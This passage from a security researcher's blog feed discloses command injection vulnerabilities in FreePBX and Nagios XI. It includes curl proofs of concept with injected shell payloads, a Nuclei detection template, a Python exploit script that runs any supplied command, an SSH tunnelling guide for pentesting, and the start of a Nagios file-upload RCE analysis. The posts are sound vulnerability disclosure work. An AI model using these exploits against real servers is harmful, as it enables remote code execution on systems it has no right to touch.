2025/09/13 21:49:50 CMD: UID=999   PID=222197 | sh -c mkdir -p asdf`id` 
2025/09/13 21:49:50 CMD: UID=999   PID=222198 | sh -c mkdir -p asdf`id`

However, we don’t even really need the / as on line 9, $key is passed directly to an ssh-keygen command without being checked:

exec("ssh-keygen -t ecdsa -b 521 -f $key -N \"\" && chown asterisk:asterisk $key && chmod 600 $key");

so long as the $key value is not an existing file. This is the second sink, and executes something like this:

2025/09/13 21:51:53 CMD: UID=999   PID=222924 | sh -c ssh-keygen -t ecdsa -b 521 -f asdf`id` -N "" && chown asterisk:asterisk asdf`id` && chmod 600 asdf`id`

As illustrated, both sinks result in several executions of the command from a single request.

Proof of Concept

For clarity in the proof of concepts below:

  • My testing instance of FreePBX IP address is 192.168.122[.]206.
  • My testing client IP address is 192.168.122[.]216.

For the testing user lowprivuser, I used the initial Administrative user to create a new user in User Management. The user was granted Allow FreePBX Administration Login = Yes. Administration Access was left to None selected.

Curl proof of concept

The command injection via the key parameter in a request looks like this:

key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`

Ultimately, the exploit can be condensed to a single curl command using the --next flag and the --cookie-jar flag.

$ curl -s \
-XPOST --cookie-jar /tmp/freepbx-cookie --data 'username=lowprivuser&password=<lowprivuserpassword>' http://192.168.122.206/admin/config.php -o /dev/null \
--next \
--cookie /tmp/freepbx-cookie -H 'Referer: http://192.168.122.206' 'http://192.168.122.206/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user=asdf&port=22&key=asdf`echo%20rcetest2>/var/www/html/rcetest.txt`&path=test' | jq
{
  "status": true,
  "message": "Login failed"
}

$ curl -sk http://192.168.122.206/rcetest.txt
rcetest2

The Referer HTTP header must be present in the second request otherwise it returns the following error and the exploit fails:

{"error":"ajaxRequest declined - Referrer"}

Nuclei template

If you need a nuclei template to check for it, this uses oast (interactsh) to discover it along with a provided username and password:

id: CVE-2025-64328

info:
  name: FreePBX - Authenticated Command Injection in Administration panel
  author: _th3y
  severity: high
  description: |
    FreePBX 17 contains a command injection caused by insufficiently sanitized user-supplied data in the testconnection -> check_ssh_connect() function within the filestore module, allowing authenticated attackers execute arbitrary shell commands as the asterisk user.
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 8.6
    cve-id: CVE-2025-64328
    cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw
  metadata:
    vendor: sangoma
    product: freepbx
    shodan-query:
      - http.title:"freepbx"
      - http.favicon.hash:"-1908328911"
      - http.favicon.hash:"1574423538"
      - http.title:"freepbx administration"
    fofa-query:
      - icon_hash="-1908328911"
      - icon_hash="1574423538"
      - title="freepbx administration"
      - title="freepbx"
    google-query:
      - intitle:"freepbx administration"
      - intitle:"freepbx"
  tags: cve,cve2025,freepbx,rce,oast,authenticated,vuln

variables:
  username: "{{username}}"
  password: "{{password}}"
  cmd: "nslookup {{interactsh-url}}"
  prefix: "{{rand_text_alpha(5)}}"

flow: http(1) && http(2)


http:
  - method: POST
    path: 
      - "{{BaseURL}}/admin/config.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "username={{username}}&password={{password}}"

    matchers:
      - type: word
        part: body
        words:
          - 'FreePBX Administration'
          - 'Hello, {{username}}'
        condition: and
        internal: true
  
  - method: GET
    path:
      - "{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}"
    headers:
      Referer: "{{BaseURL}}"
    
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

References

Exploitation in the wild:

  • https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog
  • https://thehackernews.com/2026/02/900-sangoma-freepbx-instances.html
]]>M. Cory BillingtonCVE-2025-34227 - Nagios XI Authenticated Command Injection in Configuration Wizard MySQL and PostgreSQL monitoring services leads to Remote Code Execution2025-10-13T00:00:00+00:002025-10-13T00:00:00+00:00https://theyhack.me/CVE-2025-34227-Nagios-XI-Wizard-Command-InjectionOverview

Nagios XI is vulnerable to an authenticated command injection vulnerability in the Configuration Wizard functionality, specifically the PostgreSQL and MySQL Query service monitors (possibly others as well). It is possible to inject shell characters into arguments provided to the service and execute arbitrary system commands on the underlying host as the nagios user.

Technical Details

1. Command Injection in Configuration Wizard MySQL and PostgreSQL monitoring services

The vulnerability is located within /nagiosxi/config/monitoringwizard.php. Unfortunately, this file is protected with Source Guardian, therefore it isn’t possible to do a code walkthrough to identify the exact cause of the vulnerability. Thus far, I have confirmed the command injection is possible in the database and query parameters, however it is likely possible in others.

To recreate the vulnerability, authenticate to an instance of Nagios XI as the nagiosadmin user. Retrieve a valid nagiosxi cookie and nsp, replace the values in the following curl command, and then leverage the curl command to execute the payload within the database parameter below:

$ curl -s \
-H 'Cookie: nagiosxi=<your-session-id-here>' \
--data 'update=1&nsp=<your-nsp-value-here>&step=3&nextstep=5&wizard=mysqlquery&tpl=&hostname=localhost&operation=&selectedhostconfig=&services_serial=&serviceargs_serial=&config_serial=&ip_address=127.0.0.1&port=3306&username=test&password=test&database=information_schema%3Btouch+/tmp/rceproof%3B&queryname=curl+RCE+service&query=SELECT+1&warning=50&check_interval=1&retry_interval=1&critical=200&finishButton=' \
http://192.168.122.9/nagiosxi/config/monitoringwizard.php

This will execute touch /tmp/rceproof as the ; character before and after cause the command to be executed as another shell command. The service curl RCE service takes approximately one minute to appear in the /nagiosxi/includes/components/xicore/status.php?show=services page. Once the service appears, a file /tmp/rceproof should appear, owned by the nagios user:

# ls -lah /tmp/rceproof 
-rw-r--r-- 1 nagios nagios 0 Jun 23 11:47 /tmp/rceproof

This can also be done through the browser wizard by pasting information_schema;touch+/tmp/rceproof; into the database field on the MySQL Query service setup. Finish With Defaults as soon as you see that option. I used 127.0.0.1 and a random username/password combo.

Proof of Concepts

I wrote a simple script to handle auth and the command injection:

import requests
import sys
import re

## Usage
# $ python3 monitoringservice-command-injection.py <target-url> <username> <password> <command>

## Example
# $ python3 monitoringservice-command-injection.py http://192.168.122.9/nagiosxi nagiosadmin password123 'touch /tmp/rceproof'
# [+] Service was added. Watch http://192.168.122.9/nagiosxi/includes/components/xicore/status.php?show=services for the service to appear.
# [*] Make sure to delete the "command injection service" service in the dashboard..

## Set input data
url = sys.argv[1] ## Ex: http://192.168.1.123/nagiosxi/
username = sys.argv[2]
password = sys.argv[3]
command = sys.argv[4]

## Define some constants for use the in the payload/URL
SERVICE_NAME = 'command injection service'
INTERVAL = 1

LOGIN_ENDPOINT = "/login.php"
CONFIGWIZARD_ENDPOINT = "/config/monitoringwizard.php"


def get_nsp_str(text):
    
    nsp_match = re.search(r'var\snsp_str\s=\s"([a-f0-9]+)"', text)
    if nsp_match:
        return nsp_match.group(1)


## Start HTTP session/exploitation requests
with requests.Session() as s:
    s.verify = False

    ## Proxies for Burp. Uncomment if you want to use a proxy
    s.proxies.update(dict.fromkeys(['http','https'],'http://127.0.0.1:8080'))

    ## Login section
    login_url = f"{url}{LOGIN_ENDPOINT}"
    nsp = None
    login_info_req = s.get(login_url)
    
    login_nsp = get_nsp_str(login_info_req.text)
    
    if not login_nsp:
        print("Failed to grab nsp for login")
        exit()
    
    ### Build login request
    login_data = {
        "nsp": login_nsp,
        "page": "auth",
        "pageopt": "login",
        "username": username,
        "password": password,
        "loginButton": ""
    }

    login_req = s.post(login_url, data=login_data)

    ### Confirm redirect to the `index.php` page
    if 'index.php' not in login_req.url:
        print("[-] Invalid credentials")
        exit()

    ### get fresh nsp for config wizard
    configwizard_req = s.get(f"{url}{CONFIGWIZARD_ENDPOINT}")
    configwizard_nsp = get_nsp_str(configwizard_req.text)
    

    ### Configuration for mysql query payload with command injection
    configwizard_servicecreate_payload = {
        "update": 1,
        "nsp": configwizard_nsp,
        "step": 3,
        "nextstep": 5,
        "wizard": "mysqlquery",
        "tpl": '',
        "hostname": "localhost",
        "operation": '',
        "selectedhostconfig": '',
        "services_serial": '',
        "serviceargs_serial": '',
        "config_serial": '',
        "ip_address": "127.0.0.1",
        "port": 3306,
        "username": "test",
        "password": "test",
        "database": f"information_schema;{command};",
        "hostname": "localhost",
        "password": "test",
        "queryname": SERVICE_NAME,
        "query": "SELECT 1",
        "warning": 50,
        "check_interval": INTERVAL,
        "retry_interval": INTERVAL,
        "critical": 200,
        "finishButton": ''
    }

    ### Add service for malicious mysql query

    configwizard_addservice_req = s.post(f"{url}{CONFIGWIZARD_ENDPOINT}", data=configwizard_servicecreate_payload)

    ### Some cursory checks to make sure the servie added. 
    if configwizard_addservice_req.ok and SERVICE_NAME in configwizard_addservice_req.text:
            print(f"[+] Service was added. Watch {url}/includes/components/xicore/status.php?show=services for the service to appear.")
            print(f"[*] Make sure to delete the \"{SERVICE_NAME}\" service in the dashboard.")
    else:
        print("[-] Something failed adding the service")
        exit()

Exploit source

A copy of the above python script is also available here for easy curl/wget: CVE-2025-34227_nagios-command-injection.txt

References

  • https://www.nagios.com/changelog/
  • https://www.nagios.com/products/security/
  • https://www.vulncheck.com/advisories/nagios-xi-config-wizard-auth-command-injection
  • https://www.cve.org/cverecord?id=CVE-2025-34227

Timeline

Date Update
23JUN2025 Issue reported to security@nagios.com
01JUL2025 Receipt of vulnerabilities acknowledged by Nagios
02SEP2025 Requested update on vulnerability
03SEP2025 Nagios replies to notify that fixes will be relased soon.
25SEP2025 Observed updates released at https://www.nagios.com/changelog/
25SEP2025 VulnCheck releases an advisory and issues CVE-2025-34227
13OCT2025 This article is published.
]]>M. Cory BillingtonHeadless Pentesting Machine Setup2025-09-22T00:00:00+00:002025-09-22T00:00:00+00:00https://theyhack.me/Headless-Pentesting-Machine-SetupOverview

When I was starting out in penetration testing, it always confused me how folks would say they worked using a simple CLI only linux machine in a VPS. I understood they did it in order to test from an IP that wasn’t their home IP to avoid getting their home IP blocked by the target they were testing against, but I couldn’t understand how they still used tools like Burp Suite, or a simple web browser. The answer was usually “tunnels”, but that didn’t quite click for me; I kind of need to see a working setup to make sense of it. I just kind of assumed you needed some sort of remote desktop setup.

You don’t need a full remote desktop setup! You can do it all via ssh through a very small remote linux server!

I plan on covering my usual testing setup for bug bounty using a local testing machine and then a CLI only remote machine, which will have the IP address I want my “attack traffic” to originate from; this is typically some sort of cloud hosted VPS.

TLDR; (if you don’t want to read the whole article)

Start burp, set Burp SOCKS proxy to 127.0.0.1:1080.

Set up SSH tunnels:

CLI

$ ssh -R 127.0.0.1:8765:127.0.0.1:8080 -D 127.0.0.1:1080 <username>@<cli-host>

config

Host <cli-host>
  Hostname <cli-hostname-or-ip>
  RemoteForward 127.0.0.1:8765 127.0.0.1:8080
  DynamicForward 127.0.0.1:1080
  LogLevel FATAL

Setup

I set up a small lab environment with a few Virtual Machines (VM) that will resemble a common setup during a penetration test/bug bounty/etc engagement. | Hostname | IP Address | Description | | :—: | :—————: | :——-: | |ubuntu-target-vm|192.168.122.30 | This machine should simulate a target you intend to test. index.php will return your current IP address IE $_SERVER['REMOTE_ADDR']| |ubuntu-cli-attack-vm|192.168.122.151 | This machine should simulate a CLI-only linux instance you spin up remotely IE EC2/Droplet/etc from which you want your traffic to originate from.| |ubuntu-local-attack-vm|192.168.122.118 | This machine should simulate a local testing machine where you have your GUI tools installed and primarily work from IE your laptop/desktop/etc.|

For ubuntu-target-vm, this is my testing setup to return the IP address of ubuntu-target-vm along with the IP address of the request traffic:

root@ubuntu-target-vm:~/testwebserver# cat index.php 
<?php
echo "Hello from {$_SERVER['SERVER_NAME']}\n";
echo "Your request came from IP Address: {$_SERVER['REMOTE_ADDR']}\n";
?>
root@ubuntu-target-vm:~/testwebserver# php -S 192.168.122.30:80
[Mon Sep 22 15:03:48 2025] PHP 8.3.6 Development Server (http://192.168.122.30:80) started

And when I make a curl request from my CLI only machine ubuntu-cli-attack-vm, we can see it returns the correct originating IP address 192.168.122.151:

they@ubuntu-cli-attack-vm:~$ curl -sk 192.168.122.30/index.php
Hello from 192.168.122.30
Your request came from IP Address: 192.168.122.151

I have also added an ssh key I generated on ubuntu-local-attack-vm and added to ~/.ssh/authorized_keys on ubuntu-cli-attack-vm:

they@ubuntu-local-attack-vm:~$ ssh-keygen -a 100 -t ed25519
Generating public/private ed25519 key pair.
Enter file in which to save the key (/home/they/.ssh/id_ed25519): 
...Omitted for brevity
+----[SHA256]-----+
they@ubuntu-local-attack-vm:~$ cat .ssh/id_ed25519.pub 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHvRmIJNJWRAjdnN7NjaE3OVjqgXwIP0+LXJdZJItb33 they@ubuntu-local-attack-vm

Then on ubuntu-cli-attack-vm:

they@ubuntu-cli-attack-vm:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHvRmIJNJWRAjdnN7NjaE3OVjqgXwIP0+LXJdZJItb33' >> ~/.ssh/authorized_keys

This simply alleviates the need to enter a password for every ssh connection to ubuntu-cli-attack-vm from ubuntu-local-attack-vm.

Objective

When I test on this setup, I’m looking to:

  • Have all my traffic originate from the IP address of my CLI only machine
  • Be able to use Burp Suite and a web browser on my local GUI machine and have that traffic origin from the CLI only machine
  • Be able to send traffic from CLI tools I run on the CLI only machine through Burp Suite on my local machine, and still originate from the IP of my CLI only machine

    Walkthrough

    All of this work will be done through a single SSH connection, and we will leverage two tunnels inside of that connection to transport data from ubuntu-cli-attack-vm to ubuntu-local-attack-vm, and then from ubuntu-local-attack-vm back to ubuntu-cli-attack-vm and onto the target ubuntu-target-vm.

    Layout

    Establish an SSH connection to ubuntu-cli-attack-vm from ubuntu-local-attack-vm and set up the following two tunnels:

    1. A reverse port forward
    • from port 8765 on the 127.0.0.1/localhost interface on ubuntu-cli-attack-vm (I’m using port 8765 here to remove ambiguity, but I typically use 8080 on both sides of the tunnel in practice)
    • to port 8080 on the 127.0.0.1/localhost interface on ubuntu-local-attack-vm
      1. A dynamic forward (AKA SOCKS [1] proxy)
    • from port 1080 on ubuntu-local-attack-vm
    • to ubuntu-cli-attack-vm (this doesn’t forward to a specific port, instead it sends the traffic on to it’s intended destination from ubuntu-cli-attack-vm)

There are three ways you can accomplish each of these:

  1. Command line options -R [2] and -D [3]
  2. Via the ~/.ssh/config file [4]
  3. Via the ~C escape sequence [5] Ultimately, we will end up with a setup like the following diagram illustrates:

Reverse Port Forward

This tunnel will open a port (8765) on the remote machine, ubuntu-cli-attack-vm, on the specified interface and then forward all packets sent to that port through the SSH connection to the specified port (8080) on our local machine ubuntu-local-attack-vm. The objective of this tunnel is to be able to run commands on the remote machine and forward the traffic through Burp Suite if we would like to.

CLI Reverse Port Forward

The example SSH command to do this alone would be:

$ ssh -R 127.0.0.1:8765:127.0.0.1:8080 they@192.168.122.151

And if we run that command and then execute ss -tulpn, we can see port 8765 open:

they@ubuntu-local-attack-vm:~$ ssh -R 127.0.0.1:8765:127.0.0.1:8080 they@192.168.122.151
Welcome to Ubuntu 24.04.3 LTS (GNU/Linux 6.8.0-83-generic x86_64)
...Omitted...
they@ubuntu-cli-attack-vm:~$ ss -tulpn
Netid   State    Recv-Q   Send-Q              Local Address:Port     Peer Address:Port   Process   
udp     UNCONN   0        0                      127.0.0.54:53            0.0.0.0:*                
udp     UNCONN   0        0                   127.0.0.53%lo:53            0.0.0.0:*                
udp     UNCONN   0        0          192.168.122.151%enp1s0:68            0.0.0.0:*                
tcp     LISTEN   0        128                     127.0.0.1:8765          0.0.0.0:*                
tcp     LISTEN   0        4096                      0.0.0.0:22            0.0.0.0:*                
tcp     LISTEN   0        4096                127.0.0.53%lo:53            0.0.0.0:*                
tcp     LISTEN   0        4096                   127.0.0.54:53            0.0.0.0:*                
tcp     LISTEN   0        4096                         [::]:22               [::]:*

config Reverse Port Forward

Since you may not want to have to add this option to ssh every time you connect to the machine, you can have this tunnel automatically established using the ~/.ssh/config file by adding the following option to your local ~/.ssh/config file:

Host ubuntu-cli-attack-vm 192.168.122.151
  Hostname 192.168.122.151
  RemoteForward 127.0.0.1:8765 127.0.0.1:8080

Escape Sequence Reverse Port Forward

Finally, using the ~C escape sequence, You can use R 127.0.0.1:8765:127.0.0.1:8080:

$ ssh -o EnableEscapeCommandline=yes they@192.168.122.151
Welcome to Ubuntu 24.04.3 LTS (GNU/Linux 6.8.0-83-generic x86_64)
...Omitted...
See "man sudo_root" for details.

they@ubuntu-cli-attack-vm:~$ ss -tulpn
Netid   State    Recv-Q   Send-Q              Local Address:Port     Peer Address:Port   Process   
udp     UNCONN   0        0                      127.0.0.54:53            0.0.0.0:*                
udp     UNCONN   0        0                   127.0.0.53%lo:53            0.0.0.0:*                
udp     UNCONN   0        0          192.168.122.151%enp1s0:68            0.0.0.0:*                
tcp     LISTEN   0        4096                      0.0.0.0:22            0.0.0.0:*                
tcp     LISTEN   0        4096                127.0.0.53%lo:53            0.0.0.0:*                
tcp     LISTEN   0        4096                   127.0.0.54:53            0.0.0.0:*                
tcp     LISTEN   0        4096                         [::]:22               [::]:*                
they@ubuntu-cli-attack-vm:~$ 
ssh> R 127.0.0.1:8765:127.0.0.1:8080
Forwarding port.

they@ubuntu-cli-attack-vm:~$ ss -tulpn
Netid   State    Recv-Q   Send-Q              Local Address:Port     Peer Address:Port   Process   
udp     UNCONN   0        0                      127.0.0.54:53            0.0.0.0:*                
udp     UNCONN   0        0                   127.0.0.53%lo:53            0.0.0.0:*                
udp     UNCONN   0        0          192.168.122.151%enp1s0:68            0.0.0.0:*                
tcp     LISTEN   0        128                     127.0.0.1:8765          0.0.0.0:*                
tcp     LISTEN   0        4096                      0.0.0.0:22            0.0.0.0:*                
tcp     LISTEN   0        4096                127.0.0.53%lo:53            0.0.0.0:*                
tcp     LISTEN   0        4096                   127.0.0.54:53            0.0.0.0:*                
tcp     LISTEN   0        4096                         [::]:22               [::]:*

You need a completely clear command line, so Ctrl+c or hit enter with an empty command line to clear the input buffer, then type ~C note the capital C. You may also need to enable the command line with -o EnableEscapeCommandline=yes. This can also be added to the ~/.ssh/config file so it is always enabled.

If you ever forget the syntax, type a ? in the ssh> prompt to get a list of options:

they@ubuntu-cli-attack-vm:~$ 
ssh> ?
Commands:
      -L[bind_address:]port:host:hostport    Request local forward
      -R[bind_address:]port:host:hostport    Request remote forward
      -D[bind_address:]port                  Request dynamic forward
      -KL[bind_address:]port                 Cancel local forward
      -KR[bind_address:]port                 Cancel remote forward
      -KD[bind_address:]port                 Cancel dynamic forward

Dynamic Forward

This tunnel will open a port (1080) on our local machine ubuntu-local-attack-vm and then forward any SOCKS traffic sent to that port through the SSH tunnel and egress ubuntu-cli-attack-vm to the target.

CLI Dynamic Forward

The command to establish a Dynamic port forward would be:

they@ubuntu-local-attack-vm:~$ ssh -D 127.0.0.1:1080 they@192.168.122.151

Once the connection is established, switch to a separate terminal to observe the port is open

they@ubuntu-local-attack-vm:~$ ss -tulpn
Netid State  Recv-Q Send-Q Local Address:Port    Peer Address:Port Process                         
udp   UNCONN 0      0            0.0.0.0:52037        0.0.0.0:*                                    
udp   UNCONN 0      0            0.0.0.0:5353         0.0.0.0:*                                    
udp   UNCONN 0      0         127.0.0.54:53           0.0.0.0:*                                    
udp   UNCONN 0      0      127.0.0.53%lo:53           0.0.0.0:*                                    
udp   UNCONN 0      0               [::]:5353            [::]:*                                    
udp   UNCONN 0      0               [::]:53257           [::]:*                                    
tcp   LISTEN 0      4096   127.0.0.53%lo:53           0.0.0.0:*                                    
tcp   LISTEN 0      128        127.0.0.1:1080         0.0.0.0:*     users:(("ssh",pid=10855,fd=4)) 
tcp   LISTEN 0      4096      127.0.0.54:53           0.0.0.0:*                                    
tcp   LISTEN 0      4096       127.0.0.1:631          0.0.0.0:*                                    
tcp   LISTEN 0      4096           [::1]:631             [::]:*

And then leverage a command such as curl to confirm traffic is egressing ubuntu-cli-attack-vm

they@ubuntu-local-attack-vm:~$ curl -s 192.168.122.30/index.php
Hello from 192.168.122.30
Your request came from IP Address: 192.168.122.118
they@ubuntu-local-attack-vm:~$ curl -s 192.168.122.30/index.php --proxy socks5://127.0.0.1:1080
Hello from 192.168.122.30
Your request came from IP Address: 192.168.122.151

Notice the IP address changed once the --proxy option is added

config Dynamic Port Forward

The DynamicForward option inside the ~/.ssh/config file to establish a Dynamic Port Forward automatically upon establishing an SSH connection to the host:

Host ubuntu-cli-attack-vm 192.168.122.151
  Hostname 192.168.122.151
  DynamicForward 127.0.0.1:1080

Escape Sequence Dynamic Port Forward

Finally, using the ~C escape sequence, You can use D 127.0.0.1:1080:

they@ubuntu-local-attack-vm:~$ ssh -o EnableEscapeCommandline=yes they@192.168.122.151
...Omitted...
they@ubuntu-cli-attack-vm:~$ 
ssh> D 127.0.0.1:1080
Forwarding port.

Combining Both Tunnels

CLI Both Tunnels

The ssh command to establish both tunnels would be:

$ ssh -R 127.0.0.1:8765:127.0.0.1:8080 -D 127.0.0.1:1080 they@192.168.122.151

config File Both Tunnels

I recommend using ~/.ssh/config to set both of these up, along with silencing some of the error logging messages via setting LogLevel [6] to FATAL:

Host ubuntu-cli-attack-vm 192.168.122.151
  Hostname 192.168.122.151
  RemoteForward 127.0.0.1:8765 127.0.0.1:8080
  DynamicForward 127.0.0.1:1080
  LogLevel FATAL

Burp Suite setup

For the purposes of this walkthrough, we will presume Burp Suite is listening on the default port 127.0.0.1:8080.

There is only one setting you need to configure after setting up your SSH tunnels using the above guide, and that is configuring Burp Suite to send outgoing traffic to a SOCKS proxy. After opening Burp, navigate to Proxy -> Proxy settings -> Network -> Connections -> SOCKS proxy and set the following:

  • SOCKS proxy host: -> 127.0.0.1
  • SOCKS proxy port: -> 1080 (or whichever port you choose via the Dynamic Port Forward option in ssh) Then check the Use SOCKS proxy box.

Result

I choose to set up the ~/.ssh/config file, but no matter the method, you end up with a setup where you can easily run commands from your remote attack machine ubuntu-cli-attack-vm, proxy them through Burp using the newly created listener on 127.0.0.1:8765, view the request in Burp proxy, and still have the request egress from ubuntu-cli-attack-vm as Burp forwards all traffic through the SOCKS proxy created on 127.0.0.1:1080 on ubuntu-local-attack-vm.

they@ubuntu-local-attack-vm:~$ cat .ssh/config 
Host ubuntu-cli-attack-vm 192.168.122.151
  Hostname 192.168.122.151
  RemoteForward 127.0.0.1:8765 127.0.0.1:8080
  DynamicForward 127.0.0.1:1080
  LogLevel FATAL
they@ubuntu-local-attack-vm:~$ ssh they@192.168.122.151
Welcome to Ubuntu 24.04.3 LTS (GNU/Linux 6.8.0-83-generic x86_64)
...Omitted...
they@ubuntu-cli-attack-vm:~$ curl -s 192.168.122.30/index.php --proxy http://127.0.0.1:8765
Hello from 192.168.122.30
Your request came from IP Address: 192.168.122.151

And we can observe the request in Burp:

as well as the response showing the traffic is still arriving at the target ubuntu-target-vm from ubuntu-cli-attack-vm IP 192.168.122.151. We can now use Burp via browser, or run any tools (httpx, nuclei, sqlmap, metasploit, etc) on our ubuntu-cli-attack-vm and ensure traffic goes through Burp and originates from ubuntu-cli-attack-vm.

Bonus, you can also freely use the SOCKS proxy on ubuntu-local-attack-vm with any tools that support SOCKS. An example from above:

they@ubuntu-local-attack-vm:~$ curl -s 192.168.122.30/index.php
Hello from 192.168.122.30
Your request came from IP Address: 192.168.122.118
they@ubuntu-local-attack-vm:~$ curl -s 192.168.122.30/index.php --proxy socks5://127.0.0.1:1080
Hello from 192.168.122.30
Your request came from IP Address: 192.168.122.151

So any tools installed locally can be used leveraging their respective proxy options. A bonus piece of information: if you try and access a target by hostname vs IP, use the socks5h:// option.

References

  1. SOCKS proxy wiki: https://en.wikipedia.org/wiki/SOCKS
  2. ssh -R manpage: https://man.openbsd.org/ssh#R~5
  3. ssh -D manpage: https://man.openbsd.org/ssh#D
  4. ssh_config manpage: https://man.openbsd.org/ssh_config
  5. ssh escape sequence manpage: https://man.openbsd.org/ssh#_C
]]>M. Cory BillingtonCVE-2024-13986 - Nagios XI Authenticated Arbitrary File Upload + Path Traversal leads to Remote Code Execution2025-01-07T00:00:00+00:002025-01-07T00:00:00+00:00https://theyhack.me/Nagios-XI-Authenticated-RCEOverview

I recently noticed quite a few folks recently looked at Nagios XI. Some even pulled the obfuscated stuff apart which I thought was really awesome! I still need to wrap my head around that and actually try it sometime. For these vulns, I stuck to the plainly visible stuff along with some help from one of my favorite tools pspy.

This RCE is a combination of, IMO, two vulnerabilities:

  • An arbitrary file upload (basically zero impact by itself unless you want to dig into SNMP)
  • A path traversal

I discovered the ability to upload arbitrary files through some functionality in the application for uploading mibs configurations. I could control all the file contents as well as the extension, but I could not traverse out of the location inside /usr/share/snmp/mibs/. So, that alone was not going to get me RCE.

Later on while testing some functionality in the snapshots feature with pspy running, I discovered one of the functions ran some shell commands to move mv a file and I could control the file extension, the originally uploaded file name combined with a traversal sequence, and then the final name along with a traversal sequence. This let me essentially move the file from the originally uploaded location /usr/share/snmp/mibs/ to a web accessible location /usr/local/nagiosxi/html/tools/. Combine that with a PHP file and it results in authenticated RCE as the www-data user.

Technical Details

Arbitrary File Upload

Inside /admin/mibs.php the route_request() function is responsible for mapping functionality based on the mode HTTP parameter:


function route_request()
{
    global $request;

    $mode = '';
    if (isset($request['mode'])) {
        $mode = $request['mode'];    
    }

    switch ($mode) {
        case 'download':
            do_download();
            break;
        case 'upload':
            $mode = MIB_UPLOAD_DO_NOTHING;

            $process = false;
            if (isset($request["processMibCheck"])) {
                $process = $request["processMibCheck"];
            }

            if ($process) {
                $mode = get_processing_mode();
            }

            do_upload($mode);
            break;
        case 'delete':
            do_delete();

If the mode HTTP reuqest variable is set to upload, code flow enters the case for upload. Next a check is done for the processMibCheck variable. If this variable is not set, the do_upload() function is invoked. This function is on line 1091 in /admin/mibs.php:

function do_upload($mode) {

...Omitted for brevity...

    $_FILES['uploadedfile'] = rearrange_multiple_upload($_FILES['uploadedfile']);

    $error = false;
    foreach ($_FILES['uploadedfile'] as $file) {    

        $target_path = install_mib($file);

        mibs_add_entry($target_path);

        if ($mode == MIB_UPLOAD_DO_NOTHING) {
            continue;
        }

In this function, the uploaded files $_FILES from the multipart/form-data upload are iterated through as $file and the function install_mib() is called with the file object passed in. This function is defined on line 1185 and accepts a file object $file_object:

function install_mib($file_object) {

    $target_path = get_mib_dir();
    $target_path .= "/";
    $target_path .= basename(str_replace(array(" ", "`", "$", "(", ")"), "_", $file_object['name']));

    $error = $file_object['error'];
    if ($error == UPLOAD_ERR_OK) {
        $test_write = move_uploaded_file($file_object['tmp_name'], $target_path);
...Omitted for brevity...

This function does some santiization and resolves the file path to protect against directory traversal attacks. However, any extension and any file type is allowed to be uploaded, and the files ultimately are saved in /usr/share/snmp/mibs as the name passed via the uploadedfile filename parameter in the form upload.

Alone, there is not much security impact from a web perspective as this is not a web accessible location. I did not investigate anything from an SNMP standpoint.

Path Traversal in shell command used for Renaming Snapshot Files

After identifying a vector to upload PHP files, a way to execute them via the web interface was required for impact. Before going too far into this path, we need to confirm there is a writable directory that is web accessible.

$ ls -lah /usr/local/nagiosxi/
total 40K
drwxr-xr-x 10 root     nagios 4.0K Oct 27 14:30 .
drwxr-xr-x 15 root     root   4.0K Oct 27 14:37 ..
drwxr-xr-x  2 root     nagios 4.0K Oct 27 14:30 cron
drwxr-xr-x  4 root     nagios 4.0K Oct 27 14:30 etc
drwxr-xr-x 21 root     nagios 4.0K Nov  3 14:25 html
drwxr-xr-x  3 root     nagios 4.0K Oct 27 14:30 nom
drwxr-xr-x  6 root     nagios 4.0K Oct 27 14:30 scripts
drwsrwsr-x  3 www-data nagios 4.0K Nov  3 18:31 tmp
drwxr-xr-x  2 root     nagios 4.0K Oct 27 14:30 tools
drwxrwxr-x  7 nagios   nagios 4.0K Nov  3 21:14 var

/usr/local/nagiosxi/html is only writable by root, however multiple subfolders are writable by the nagios user, which is what this command runs as as we’ll see later:

 ls -lah /usr/local/nagiosxi/html/
total 1.2M
drwxr-xr-x 21 root   nagios 4.0K Nov  3 14:25 .
drwxr-xr-x 10 root   nagios 4.0K Oct 27 14:30 ..
drwxr-xr-x  2 nagios nagios 4.0K Oct 27 14:30 about
drwxr-xr-x  2 nagios nagios 4.0K Oct 27 14:30 account
drwxr-xr-x  2 nagios nagios 4.0K Oct 27 14:30 admin
...Omitted for brevity...
-rwxr-xr--  1 nagios nagios  12K Oct 27 14:30 suggest.php
-rw-r--r--  1 root   root     69 Oct 27 16:04 test2.php
-rw-r--r--  1 root   root    774 Oct 27 15:59 test.php
drwxr-xr-x  2 nagios nagios 4.0K Nov  3 19:45 tools
drwxr-xr-x  3 nagios nagios 4.0K Oct 27 14:30 ui
-rwxr-xr--  1 nagios nagios 107K Oct 27 14:30 upgrade.php
drwxr-xr-x  2 nagios nagios 4.0K Oct 27 14:30 views

We choose /usr/local/nagiosxi/html/tools/ and move into exploring potential ways to get the uploaded PHP file into that directory.

Inside /admin/coreconfigsnapshots.php, multiple actions are available:

function route_request()
{
    global $request;

    if (isset($request["download"])) {
        do_download();
    } else if (isset($request["view"])) {
        do_view();
    } else if (isset($request["viewdiff"])) {
        $ts = grab_request_var('viewdiff', '');
        show_ccm_file_changes($ts);
    } else if (isset($request["currentdiff"])) {
        $ts = grab_request_var('currentdiff', '');
        $archive = grab_request_var('archive', 0);
        show_ccm_file_changes($ts, true, $archive);
    } else if (isset($request["delete"])) {
        do_delete();
    } else if (isset($request["doarchive"])) {
        do_archive();
    } else if (isset($request["restore"])) {
        do_restore();
    } else if (isset($request["rename"])) {
        do_rename();
    }

    show_log();
}

